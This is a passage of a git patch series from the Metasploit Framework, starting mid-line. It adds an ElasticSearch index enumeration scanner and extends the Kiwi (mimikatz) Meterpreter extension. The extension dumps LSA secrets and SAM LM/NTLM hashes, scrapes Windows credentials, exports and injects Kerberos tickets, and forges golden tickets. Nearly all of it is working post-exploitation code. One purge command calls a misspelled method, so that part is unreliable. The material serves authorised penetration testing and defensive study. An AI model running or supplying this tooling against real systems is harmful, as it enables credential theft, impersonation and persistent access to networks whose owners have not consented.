200) temp.each do |index| - print_good("Index : " + index[0]) + print_good("Index : " + index[0]) end end From ad4c3544604ad9716c518393c51a41d9f981c29f Mon Sep 17 00:00:00 2001 From: silascutler Date: Mon, 17 Mar 2014 13:38:33 -0400 Subject: [PATCH 065/853] Update es_enum.rb Corrected changes from dev module --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index a67961323d..d74af4984b 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary end if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 - path = store_loot("couchdb.enum.file", "text/plain", rhost, res.body, "CouchDB Enum Results") + path = store_loot("elasticsearch.enum.file", "text/plain", rhost, res.body, "ElasticSearch Enum Results") print_status("Results saved to #{path}") else print_error("Failed to save the result") From 91e198fd636f151af83ee810ae85aba41c6ec4de Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 18 Mar 2014 09:45:31 +1000 Subject: [PATCH 066/853] Add SAM key dump in LSA dumping output --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 12 ++++++- .../post/meterpreter/extensions/kiwi/tlv.rb | 6 ++++ .../ui/console/command_dispatcher/kiwi.rb | 34 ++++++++++++++----- 3 files changed, 42 insertions(+), 10 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index e50b6aa728..4c2435cf55 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -55,7 +55,8 @@ class Kiwi < Extension :syskey => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY)), :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), :nt6keys => [], - :secrets => [] + :secrets => [], + :samkeys => [] } response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k| @@ -80,6 +81,15 @@ class Kiwi < Extension result[:secrets] << r end + response.each(TLV_TYPE_KIWI_LSA_SAM) do |s| + result[:samkeys] << { + :rid => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_RID), + :user => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_USER), + :ntlm_hash => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_NTLMHASH)), + :lm_hash => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SAM_LMHASH)) + } + end + return result end diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index 4011729986..0dab0d3d21 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -41,6 +41,12 @@ TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 30 TLV_TYPE_KIWI_LSA_SECRET_OLD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 31) TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 32) +TLV_TYPE_KIWI_LSA_SAM = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 33) +TLV_TYPE_KIWI_LSA_SAM_RID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 34) +TLV_TYPE_KIWI_LSA_SAM_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 35) +TLV_TYPE_KIWI_LSA_SAM_LMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 36) +TLV_TYPE_KIWI_LSA_SAM_NTLMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 37) + end end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 2b6aaa49fd..f5ca784aef 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -97,10 +97,11 @@ class Console::CommandDispatcher::Kiwi print_line("NT6 Key Count : #{lsa[:nt6keys].length}") if lsa[:nt6keys].length > 0 - print_line lsa[:nt6keys].to_enum.with_index(1) do |k, i| - print_line("#{i.to_s.rjust(2, ' ')}. ID : #{k[:id]}") - print_line("#{i.to_s.rjust(2, ' ')}. Value : #{k[:value]}") + print_line + index = i.to_s.rjust(2, ' ') + print_line("#{index}. ID : #{k[:id]}") + print_line("#{index}. Value : #{k[:value]}") end end @@ -108,14 +109,29 @@ class Console::CommandDispatcher::Kiwi print_line("Secret Count : #{lsa[:secrets].length}") if lsa[:secrets].length > 0 lsa[:secrets].to_enum.with_index(1) do |s, i| - print_line - print_line("#{i.to_s.rjust(2, ' ')}. Name : #{s[:name]}") - print_line("#{i.to_s.rjust(2, ' ')}. Service : #{s[:service]}") if s[:service] - print_line("#{i.to_s.rjust(2, ' ')}. NTLM : #{s[:ntlm]}") if s[:ntlm] - print_line("#{i.to_s.rjust(2, ' ')}. Current : #{s[:current]}") if s[:current] - print_line("#{i.to_s.rjust(2, ' ')}. Old : #{s[:old]}") if s[:old] + print_line + index = i.to_s.rjust(2, ' ') + print_line("#{index}. Name : #{s[:name]}") + print_line("#{index}. Service : #{s[:service]}") if s[:service] + print_line("#{index}. NTLM : #{s[:ntlm]}") if s[:ntlm] + print_line("#{index}. Current : #{s[:current]}") if s[:current] + print_line("#{index}. Old : #{s[:old]}") if s[:old] end end + + print_line + print_line("SAM Key Count : #{lsa[:samkeys].length}") + if lsa[:samkeys].length > 0 + lsa[:samkeys].to_enum.with_index(1) do |s, i| + print_line + index = i.to_s.rjust(2, ' ') + print_line("#{index}. RID : #{s[:rid]}") + print_line("#{index}. User : #{s[:user]}") + print_line("#{index}. LM Hash : #{s[:lm_hash]}") if s[:lm_hash] + print_line("#{index}. NTLM Hash : #{s[:ntlm_hash]}") if s[:ntlm_hash] + end + end + print_line end From d36159710409c6d07e312f0980f506845662d5f4 Mon Sep 17 00:00:00 2001 From: silascutler Date: Tue, 18 Mar 2014 09:20:04 -0400 Subject: [PATCH 067/853] Update es_enum.rb --- .../scanner/elasticsearch/es_enum.rb | 48 +++++++------------ 1 file changed, 18 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index d74af4984b..a44eea1cee 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -3,35 +3,32 @@ # Current source: https://github.com/rapid7/metasploit-framework ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary - # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient - # Scanner mixin should be near last include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - def initialize - super( - 'Name' => 'ElasticSearch Enum Utility', - 'Description' => 'Send a request to enumerate ElasticSearch indices', - 'Author' => ['Silas Cutler MSF_LICENSE - ) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Enum Utility', + 'Description' => %q{ Send a request to enumerate ElasticSearch indices}, + 'Author' => + [ + 'Silas Cutler ' + ], + 'License' => MSF_LICENSE + )) + register_options( [ Opt::RPORT(9200) - ] - ) - + ], self.class) end - def run_host(target_host) - + def run_host(ip) begin res = send_request_raw({ 'uri' => '/_aliases', @@ -39,33 +36,24 @@ class Metasploit3 < Msf::Auxiliary 'version' => '1.0', }, 10) - if res.nil? - print_error("No response for #{target_host}") - return nil - end - begin - temp = JSON.parse(res.body) + json_body = JSON.parse(res.body) rescue JSON::ParserError print_error("Unable to parse JSON") return end - - if (res.code == 200) - temp.each do |index| + if res and res.code == 200 and res.body.length > 0 + json_body.each do |index| print_good("Index : " + index[0]) end - end - if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 - path = store_loot("elasticsearch.enum.file", "text/plain", rhost, res.body, "ElasticSearch Enum Results") - print_status("Results saved to #{path}") + path = store_loot("elasticsearch.enum.file", "text/plain", ip, res.body, "ElasticSearch Enum Results") + print_good("Results saved to #{path}") else print_error("Failed to save the result") end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end From 3635fff98e3e62f6c4051918fa2c77d5f871dd31 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 14:25:11 +1000 Subject: [PATCH 068/853] Add support for kerberos ticket enumeration Fix up a bunch of other issues and do some code tidies too. --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 74 +++++++++- .../post/meterpreter/extensions/kiwi/tlv.rb | 14 +- .../ui/console/command_dispatcher/kiwi.rb | 127 +++++++++++++++--- 3 files changed, 193 insertions(+), 22 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 4c2435cf55..b19cc0278a 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -93,15 +93,79 @@ class Kiwi < Extension return result end - def golden_ticket_use(ticket) - request = Packet.create_request('kiwi_golden_ticket_use') - request.add_tlv(TLV_TYPE_KIWI_GOLD_TICKET, ticket, false, true) + @@kerberos_flags = [ + "NAME CANONICALIZE", + "", + "OK AS DELEGATE", + "", + "HW AUTHENT", + "PRE AUTHENT", + "INITIAL", + "RENEWABLE", + "INVALID", + "POSTDATED", + "MAY POSTDATE", + "PROXY", + "PROXIABLE", + "FORWARDED", + "FORWARDABLE", + "RESERVED" + ] + def to_kerberos_flag_list(flags) + flags = flags >> 16 + results = [] + + @@kerberos_flags.each_with_index do |item, idx| + mask = 1 << idx + + if (flags & (1 << idx)) != 0 + results << item + end + end + + return results + end + + def kerberos_ticket_list(export) + export ||= false + request = Packet.create_request('kiwi_kerberos_ticket_list') + request.add_tlv(TLV_TYPE_KIWI_KERB_EXPORT, export) + response = client.send_request(request) + + results = [] + + response.each(TLV_TYPE_KIWI_KERB_TKT) do |t| + results << { + :enc_type => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_ENCTYPE), + :start => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_START), + :end => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_END), + :max_renew => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_MAXRENEW), + :server => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_SERVERNAME), + :server_realm => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_SERVERREALM), + :client => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME), + :client_realm => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM), + :flags => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_FLAGS), + :raw => t.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) + } + end + + return results + end + + def kerberos_ticket_use(ticket) + request = Packet.create_request('kiwi_kerberos_ticket_use') + request.add_tlv(TLV_TYPE_KIWI_KERB_TKT_RAW, ticket, false, true) + client.send_request(request) + end + + def kerberos_ticket_purge + request = Packet.create_request('kiwi_kerberos_ticket_purge') client.send_request(request) end def golden_ticket_create(user, domain, sid, tgt) - request = Packet.create_request('kiwi_golden_ticket_create') + request = Packet.create_request('kiwi_kerberos_golden_ticket_create') request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user) request.add_tlv(TLV_TYPE_KIWI_GOLD_DOMAIN, domain) request.add_tlv(TLV_TYPE_KIWI_GOLD_SID, sid) @@ -109,7 +173,7 @@ class Kiwi < Extension response = client.send_request(request) - return response.get_tlv_value(TLV_TYPE_KIWI_GOLD_TICKET) + return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) end def scrape_passwords(pwd_id) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index 0dab0d3d21..ed40d8f99e 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -19,7 +19,6 @@ TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10 TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11) TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12) TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13) -TLV_TYPE_KIWI_GOLD_TICKET = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 14) TLV_TYPE_KIWI_LSA_VER_MAJ = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 15) TLV_TYPE_KIWI_LSA_VER_MIN = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 16) @@ -47,6 +46,19 @@ TLV_TYPE_KIWI_LSA_SAM_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 35 TLV_TYPE_KIWI_LSA_SAM_LMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 36) TLV_TYPE_KIWI_LSA_SAM_NTLMHASH = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 37) +TLV_TYPE_KIWI_KERB_EXPORT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 38) +TLV_TYPE_KIWI_KERB_TKT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 39) +TLV_TYPE_KIWI_KERB_TKT_ENCTYPE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 40) +TLV_TYPE_KIWI_KERB_TKT_START = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 41) +TLV_TYPE_KIWI_KERB_TKT_END = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 42) +TLV_TYPE_KIWI_KERB_TKT_MAXRENEW = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 43) +TLV_TYPE_KIWI_KERB_TKT_SERVERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 44) +TLV_TYPE_KIWI_KERB_TKT_SERVERREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 45) +TLV_TYPE_KIWI_KERB_TKT_CLIENTNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 46) +TLV_TYPE_KIWI_KERB_TKT_CLIENTREALM = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 47) +TLV_TYPE_KIWI_KERB_TKT_FLAGS = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 48) +TLV_TYPE_KIWI_KERB_TKT_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 49) + end end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index f5ca784aef..8972d0aeb2 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -26,7 +26,18 @@ class Console::CommandDispatcher::Kiwi # def initialize(shell) super + print_line + print_line + print_line(" .#####. mimikatz 2.0 alpha (#{client.platform}) release \"Kiwi en C\"") + print_line(" .## ^ ##.") + print_line(" ## / \\ ## /* * *") + print_line(" ## \\ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )") + print_line(" '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)") + print_line(" '#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */") + print_line + if (client.platform =~ /x86/) and (client.sys.config.sysinfo['Architecture'] =~ /x64/) + print_line print_warning "Loaded x86 Kiwi on an x64 architecture." end @@ -37,16 +48,18 @@ class Console::CommandDispatcher::Kiwi # def commands { - "creds_wdigest" => "Attempt to retrieve WDigest creds", - "creds_msv" => "Attempt to retrieve LM/NTLM creds (hashes)", - "creds_livessp" => "Attempt to retrieve LiveSSP creds", - "creds_ssp" => "Attempt to retrieve SSP creds", - "creds_tspkg" => "Attempt to retrieve TsPkg creds", - "creds_kerberos" => "Attempt to retrieve Kerberos creds", - "creds_all" => "Attempt to retrieve all credentials", - "golden_ticket_create" => "Attempt to create a golden kerberos ticket", - "golden_ticket_use" => "Attempt to use a golden kerberos ticket", - "lsa_dump" => "Attempt to dump LSA secrets" + "creds_wdigest" => "Attempt to retrieve WDigest creds", + "creds_msv" => "Attempt to retrieve LM/NTLM creds (hashes)", + "creds_livessp" => "Attempt to retrieve LiveSSP creds", + "creds_ssp" => "Attempt to retrieve SSP creds", + "creds_tspkg" => "Attempt to retrieve TsPkg creds", + "creds_kerberos" => "Attempt to retrieve Kerberos creds", + "creds_all" => "Attempt to retrieve all credentials", + "golden_ticket_create" => "Attempt to create a golden kerberos ticket", + "kerberos_ticket_use" => "Attempt to use a kerberos ticket", + "kerberos_ticket_purge" => "Attempt to purege any in-use kerberos tickets", + "kerberos_ticket_list" => "Attempt to list all kerberos tickets", + "lsa_dump" => "Attempt to dump LSA secrets" } end @@ -150,12 +163,94 @@ class Console::CommandDispatcher::Kiwi ::File.open( target, 'wb' ) do |f| f.write ticket end - print_good("Golden ticket written to #{target}") + print_good("Golden Kerberos ticket written to #{target}") end - def cmd_golden_ticket_use(*args) + @@kerberos_ticket_list_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help banner" ], + "-e" => [ false, "Export Kerberos tickets to disk" ], + "-p" => [ true, "Path to export Kerberos tickets to" ] + ) + + def kerberos_ticket_list_usage + print( + "\nUsage: kerberos_ticket_list [-h] [-e ] [-p ]\n\n" + + "List all the available Kerberos tickets.\n\n" + + @@kerberos_ticket_list_opts.usage) + end + + def cmd_kerberos_ticket_list(*args) + if args.include?("-h") + kerberos_ticket_list_usage + return true + end + + export = false + export_path = "." + + @@kerberos_ticket_list_opts.parse(args) { |opt, idx, val| + case opt + when "-e" + export = true + when "-p" + export_path = val + end + } + + tickets = client.kiwi.kerberos_ticket_list(export) + + fields = ['Server', 'Client', 'Start', 'End', 'Max Renew', 'Flags'] + fields << 'Export Path' if export + + table = Rex::Ui::Text::Table.new( + 'Header' => "Kerberos Tickets", + 'Indent' => 0, + 'SortIndex' => 0, + 'Columns' => fields + ) + + tickets.each do |t| + flag_list = client.kiwi.to_kerberos_flag_list(t[:flags]).join(", ") + values = [ + "#{t[:server]} @ #{t[:server_realm]}", + "#{t[:client]} @ #{t[:client_realm]}", + t[:start], + t[:end], + t[:max_renew], + "#{t[:flags].to_s(16).rjust(8, '0')} (#{flag_list})" + ] + + if export + path = "" + if t[:raw] + id = "#{values[0]}-#{values[1]}".gsub(/[\\\/\$ ]/, '-') + file = "kerb-#{id}-#{Rex::Text.rand_text_alpha(8)}.tkt" + path = ::File.expand_path(File.join(export_path, file)) + ::File.open(path, 'wb') do |x| + x.write t[:raw] + end + end + values << path + end + + table << values + end + + print_line + print_line(table.to_s) + print_line("Total Tickets : #{tickets.length}") + + return true + end + + def cmd_kerberos_ticket_purge(*args) + client.kiwi.keberos_ticket_purge + print_good("Kerberos tickets purged") + end + + def cmd_kerberos_ticket_use(*args) if args.length != 1 - print_line("Usage: golden_ticket_use ticketpath") + print_line("Usage: kerberos_ticket_use ticketpath") return end @@ -164,9 +259,9 @@ class Console::CommandDispatcher::Kiwi ::File.open(target, 'rb') do |f| ticket += f.read(f.stat.size) end - print_status("Using ticket stored in #{target}, #{ticket.length} bytes") - client.kiwi.golden_ticket_use(ticket) - print_good("Ticket applied successfully") + print_status("Using Kerberos ticket stored in #{target}, #{ticket.length} bytes") + client.kiwi.kerberos_ticket_use(ticket) + print_good("Kerberos ticket applied successfully") end def cmd_creds_all(*args) From 0dcf9927818005f89c4d2611ffcb3c13809d8a7c Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 19 Mar 2014 15:45:53 +1000 Subject: [PATCH 069/853] Add comments to the kiwi source --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 159 +++++++++++++++--- .../ui/console/command_dispatcher/kiwi.rb | 124 ++++++++++---- 2 files changed, 230 insertions(+), 53 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index b19cc0278a..20cf637984 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -21,6 +21,10 @@ module Kiwi class Kiwi < Extension + # + # These are constants that identify the type of credential to dump + # from the target machine. + # PWD_ID_SEK_ALLPASS = 0 PWD_ID_SEK_WDIGEST = 1 PWD_ID_SEK_MSV = 2 @@ -31,6 +35,33 @@ class Kiwi < Extension PWD_ID_SEK_TICKETS = 7 PWD_ID_SEK_DPAPI = 8 + # + # List of names which represent the flags that are part of the + # dumped kerberos tickets. The order of these is important. Each + # of them was pulled from the Mimikatz 2.0 source base. + # + @@kerberos_flags = [ + "NAME CANONICALIZE", + "", + "OK AS DELEGATE", + "", + "HW AUTHENT", + "PRE AUTHENT", + "INITIAL", + "RENEWABLE", + "INVALID", + "POSTDATED", + "MAY POSTDATE", + "PROXY", + "PROXIABLE", + "FORWARDED", + "FORWARDABLE", + "RESERVED" + ] + + # + # Typical extension initialization routine. + # def initialize(client) super(client, 'kiwi') @@ -43,6 +74,11 @@ class Kiwi < Extension ]) end + # + # Dump the LSA secrets from the target machine. + # + # Returns [Array[Hash]] + # def lsa_dump request = Packet.create_request('kiwi_lsa_dump_secrets') @@ -93,25 +129,14 @@ class Kiwi < Extension return result end - @@kerberos_flags = [ - "NAME CANONICALIZE", - "", - "OK AS DELEGATE", - "", - "HW AUTHENT", - "PRE AUTHENT", - "INITIAL", - "RENEWABLE", - "INVALID", - "POSTDATED", - "MAY POSTDATE", - "PROXY", - "PROXIABLE", - "FORWARDED", - "FORWARDABLE", - "RESERVED" - ] - + # + # Convert a flag set to a list of string representations for the bit flags + # that are set. + # + # +flags+ [Integer] - Integer bitmask of Kerberos token flags. + # + # Returns [String] + # def to_kerberos_flag_list(flags) flags = flags >> 16 results = [] @@ -127,6 +152,13 @@ class Kiwi < Extension return results end + # + # List available kerberos tickets. + # + # +export+ [Bool] - Set to +true+ to export the content of each ticket + # + # Returns [Array[Hash]] + # def kerberos_ticket_list(export) export ||= false request = Packet.create_request('kiwi_kerberos_ticket_list') @@ -153,17 +185,41 @@ class Kiwi < Extension return results end + # + # Use the given ticket in the current session. + # + # +ticket+ [Array[Byte]] - Content of the Kerberos ticket to use. + # + # Returns [Bool] + # def kerberos_ticket_use(ticket) request = Packet.create_request('kiwi_kerberos_ticket_use') request.add_tlv(TLV_TYPE_KIWI_KERB_TKT_RAW, ticket, false, true) client.send_request(request) + return true end + # + # Purge any Kerberos tickets that have been added to the current session. + # + # Returns [Bool] + # def kerberos_ticket_purge request = Packet.create_request('kiwi_kerberos_ticket_purge') client.send_request(request) + return true end + # + # Create a new golden kerberos ticket on the target machine and return it. + # + # +user+ [String] - Name of the user to create the ticket for. + # +domain+ [String] - Domain name. + # +sid+ [String] - SID of the domain. + # +tgt+ [String] - The kerberos ticket granting token. + # + # Returns [Array[Byte]] + # def golden_ticket_create(user, domain, sid, tgt) request = Packet.create_request('kiwi_kerberos_golden_ticket_create') request.add_tlv(TLV_TYPE_KIWI_GOLD_USER, user) @@ -176,6 +232,13 @@ class Kiwi < Extension return response.get_tlv_value(TLV_TYPE_KIWI_KERB_TKT_RAW) end + # + # Scrape passwords from the target machine. + # + # +pwd_id+ - ID of the type credential to scrape. + # + # Returns [Array[Hash]] + # def scrape_passwords(pwd_id) request = Packet.create_request('kiwi_scrape_passwords') request.add_tlv(TLV_TYPE_KIWI_PWD_ID, pwd_id) @@ -197,36 +260,79 @@ class Kiwi < Extension return results end + # + # Scrape all passwords from the target machine. + # + # Returns [Array[Hash]] + # def all_pass return scrape_passwords(PWD_ID_SEK_ALLPASS) end + # + # Scrape wdigest credentials from the target machine. + # + # Returns [Array[Hash]] + # def wdigest return scrape_passwords(PWD_ID_SEK_WDIGEST) end + # + # Scrape msv credentials from the target machine. + # + # Returns [Array[Hash]] + # def msv return scrape_passwords(PWD_ID_SEK_MSV) end + # + # Scrape LiveSSP credentials from the target machine. + # + # Returns [Array[Hash]] + # def livessp return scrape_passwords(PWD_ID_SEK_LIVESSP) end + # + # Scrape SSP credentials from the target machine. + # + # Returns [Array[Hash]] + # def ssp return scrape_passwords(PWD_ID_SEK_SSP) end + # + # Scrape TSPKG credentials from the target machine. + # + # Returns [Array[Hash]] + # def tspkg return scrape_passwords(PWD_ID_SEK_TSPKG) end + # + # Scrape Kerberos credentials from the target machine. + # + # Returns [Array[Hash]] + # def kerberos return scrape_passwords(PWD_ID_SEK_KERBEROS) end protected + # + # Convert an array of bytes to a string-based hex dump in the format + # AA BB CC DD EE FF + # + # +bytes+ [Array[Byte]] - Array of bytes to convert. + # + # Returns [String]. + # def to_hex_dump(bytes) return nil unless bytes @@ -235,11 +341,26 @@ protected }.join(' ') end + # + # Convert an array of bytes to a hex string without spaces + # AABBCCDDEEFF + # + # +bytes+ [Array[Byte]] - Array of bytes to convert. + # + # Returns [String]. + # def to_hex_string(bytes) return nil unless bytes bytes.unpack('H*')[0] end + # + # Convert an array of bytes to a GUID string + # + # +bytes+ Array of bytes to convert. + # + # Returns [String]. + # def to_guid(bytes) return nil unless bytes s = bytes.unpack('H*')[0] diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 8972d0aeb2..5fe2ac9de0 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -14,6 +14,7 @@ module Ui # http://blog.gentilkiwi.com/mimikatz # # extension converted by OJ Reeves (TheColonial) +# ### class Console::CommandDispatcher::Kiwi @@ -22,7 +23,16 @@ class Console::CommandDispatcher::Kiwi include Console::CommandDispatcher # - # Initializes an instance of the priv command interaction. + # Name for this dispatcher + # + def name + "Kiwi" + end + + # + # Initializes an instance of the priv command interaction. This function + # also outputs a banner which gives proper acknowledgement to the original + # author of the Mimikatz 2.0 software. # def initialize(shell) super @@ -63,36 +73,9 @@ class Console::CommandDispatcher::Kiwi } end - def scrape_passwords(provider, method) - get_privs - print_status("Retrieving #{provider} credentials") - accounts = method.call - - table = Rex::Ui::Text::Table.new( - 'Header' => "#{provider} credentials", - 'Indent' => 0, - 'SortIndex' => 4, - 'Columns' => - [ - 'Domain', 'User', 'Password', 'Auth Id', 'LM Hash', 'NTLM Hash' - ] - ) - - accounts.each do |acc| - table << [ - acc[:domain], - acc[:username], - acc[:password], - "#{acc[:auth_hi]} ; #{acc[:auth_lo]}", - acc[:lm], - acc[:ntlm] - ] - end - - print_line table.to_s - return true - end - + # + # Invoke the LSA secret dump on thet target. + # def cmd_lsa_dump(*args) get_privs @@ -148,6 +131,9 @@ class Console::CommandDispatcher::Kiwi print_line end + # + # Invoke the golden kerberos ticket creation functionality on the target. + # def cmd_golden_ticket_create(*args) if args.length != 5 print_line("Usage: golden_ticket_create user domain sid tgt ticketpath") @@ -166,12 +152,18 @@ class Console::CommandDispatcher::Kiwi print_good("Golden Kerberos ticket written to #{target}") end + # + # Valid options for the ticket listing functionality. + # @@kerberos_ticket_list_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner" ], "-e" => [ false, "Export Kerberos tickets to disk" ], "-p" => [ true, "Path to export Kerberos tickets to" ] ) + # + # Output the usage for the ticket listing functionality. + # def kerberos_ticket_list_usage print( "\nUsage: kerberos_ticket_list [-h] [-e ] [-p ]\n\n" + @@ -179,6 +171,9 @@ class Console::CommandDispatcher::Kiwi @@kerberos_ticket_list_opts.usage) end + # + # Invoke the kerberos ticket listing functionality on the target machine. + # def cmd_kerberos_ticket_list(*args) if args.include?("-h") kerberos_ticket_list_usage @@ -243,11 +238,17 @@ class Console::CommandDispatcher::Kiwi return true end + # + # Invoke the kerberos ticket purging functionality on the target machine. + # def cmd_kerberos_ticket_purge(*args) client.kiwi.keberos_ticket_purge print_good("Kerberos tickets purged") end + # + # Use a locally stored Kerberos ticket in the current session. + # def cmd_kerberos_ticket_use(*args) if args.length != 1 print_line("Usage: kerberos_ticket_use ticketpath") @@ -264,41 +265,64 @@ class Console::CommandDispatcher::Kiwi print_good("Kerberos ticket applied successfully") end + # + # Dump all the possible credentials to screen. + # def cmd_creds_all(*args) method = Proc.new { client.kiwi.all_pass } scrape_passwords("all", method) end + # + # Dump all wdigest credentials to screen. + # def cmd_creds_wdigest(*args) method = Proc.new { client.kiwi.wdigest } scrape_passwords("wdigest", method) end + # + # Dump all msv credentials to screen. + # def cmd_creds_msv(*args) method = Proc.new { client.kiwi.msv } scrape_passwords("msv", method) end + # + # Dump all LiveSSP credentials to screen. + # def cmd_creds_livessp(*args) method = Proc.new { client.kiwi.livessp } scrape_passwords("livessp", method) end + # + # Dump all SSP credentials to screen. + # def cmd_creds_ssp(*args) method = Proc.new { client.kiwi.ssp } scrape_passwords("ssp", method) end + # + # 